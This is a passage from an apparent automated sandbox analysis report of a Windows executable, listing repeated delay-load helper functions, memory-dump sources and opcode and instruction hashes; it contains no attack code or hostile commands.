                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 75344c389c54a8fc76eccb8f6af0505ed20fa50b1bef50e000b522437c86b926
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 75344c389c54a8fc76eccb8f6af0505ed20fa50b1bef50e000b522437c86b926
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1d0cb5784359a6f9cb2334d3c75af35019fc4d435f5006ce0fab774bdeb6bc09
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 1d0cb5784359a6f9cb2334d3c75af35019fc4d435f5006ce0fab774bdeb6bc09
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2a7125445f03acaaa8164726b5850a4400819293e9ca8d937b07d7173f1dc4b0
                                                            • Instruction ID: 9184a12e28b8495a698e3089aac7bbfee703bbce70ba66fdb3bb0caf1a00b93f
                                                            • Opcode Fuzzy Hash: 2a7125445f03acaaa8164726b5850a4400819293e9ca8d937b07d7173f1dc4b0
                                                            • Instruction Fuzzy Hash: 1EA012F12540C53CF02412129D06C7B021CC1C0B10330421DF414B00C15D8008040872
                                                            Function 000EE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 89041992e94627ba0e5a812a242eeb9bdb8af552ff19cebea40abceedaee3822
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 89041992e94627ba0e5a812a242eeb9bdb8af552ff19cebea40abceedaee3822
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            Function 000EE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 92003dc451e5ded7df4132f4fee25909e9808103886ad37c69840417a05788d4
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 92003dc451e5ded7df4132f4fee25909e9808103886ad37c69840417a05788d4
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            Function 000EE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: dfb3a2b8e8a91b00dffcd7929426acf70aec8b6f36dc3d99864adc7c360de48e
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: dfb3a2b8e8a91b00dffcd7929426acf70aec8b6f36dc3d99864adc7c360de48e
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            Function 000EE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c942430491ed5612ff33bb371924b23b9e1cd4a6c943f7441177ebfeb3297a82
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: c942430491ed5612ff33bb371924b23b9e1cd4a6c943f7441177ebfeb3297a82
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            Function 000EE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4749a8e088fc469e4aabc9894804f67d7d00e956a314cc758857465687ef7d76
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 4749a8e088fc469e4aabc9894804f67d7d00e956a314cc758857465687ef7d76
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            Function 000EE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c847b9b6eddc4007782c111ffcd4f6b1cccdd590b87f1687b6d9ed18439d4bbf
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: c847b9b6eddc4007782c111ffcd4f6b1cccdd590b87f1687b6d9ed18439d4bbf
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            Function 000EE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ad0e4c905e85257fc93b6f5d5328946f2db8024bae18d2d3c6708b5bdb06c244
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: ad0e4c905e85257fc93b6f5d5328946f2db8024bae18d2d3c6708b5bdb06c244
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            Function 000EE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 67f58d6b53f084134f58ccd790b68a49141130caa572c6b95b94bdc662a35e79
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: 67f58d6b53f084134f58ccd790b68a49141130caa572c6b95b94bdc662a35e79
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            Function 000EE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7a78d350a32dd3243de0666e9948fd38d809c7d6d5de593bad998499fee19126
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: 7a78d350a32dd3243de0666e9948fd38d809c7d6d5de593bad998499fee19126
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            Function 000EE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5632675b6867307c043e36e71472b06bc87a297df4c8b4daa9f34cb2705f62fc
                                                            • Instruction ID: f5a523c96a8ebfec92200e79a47a23e6c7290dfc0968584dea04ec9d95b02da6
                                                            • Opcode Fuzzy Hash: 5632675b6867307c043e36e71472b06bc87a297df4c8b4daa9f34cb2705f62fc
                                                            • Instruction Fuzzy Hash: E7A011E22A80C83CF02823A2AE02C3B020CC2C0B22330832EF808A00C2AE80080808B0
                                                            Function 000EE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6b6ef76e111551d4fe46fd96345c7a0b0257f9da5c9276334cd76109ba0344fc
                                                            • Instruction ID: a0685b6973c4edab55face3cda7930adb0d60d7c3842157555535b54d265eae3
                                                            • Opcode Fuzzy Hash: 6b6ef76e111551d4fe46fd96345c7a0b0257f9da5c9276334cd76109ba0344fc
                                                            • Instruction Fuzzy Hash: F3A012D21580C57CF01413529D02C3B010CC1C0B10330461EF405900C16D8008080870
                                                            Function 000EE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 79727d2cf4512fbefde8ba8ddb56fe7200128bc33df7c00395692735e222f2b6
                                                            • Instruction ID: a0685b6973c4edab55face3cda7930adb0d60d7c3842157555535b54d265eae3
                                                            • Opcode Fuzzy Hash: 79727d2cf4512fbefde8ba8ddb56fe7200128bc33df7c00395692735e222f2b6
                                                            • Instruction Fuzzy Hash: F3A012D21580C57CF01413529D02C3B010CC1C0B10330461EF405900C16D8008080870
                                                            Function 000EAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,000EAE72,C:\Users\user\Desktop,00000000,0011946A,00000006), ref: 000EAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
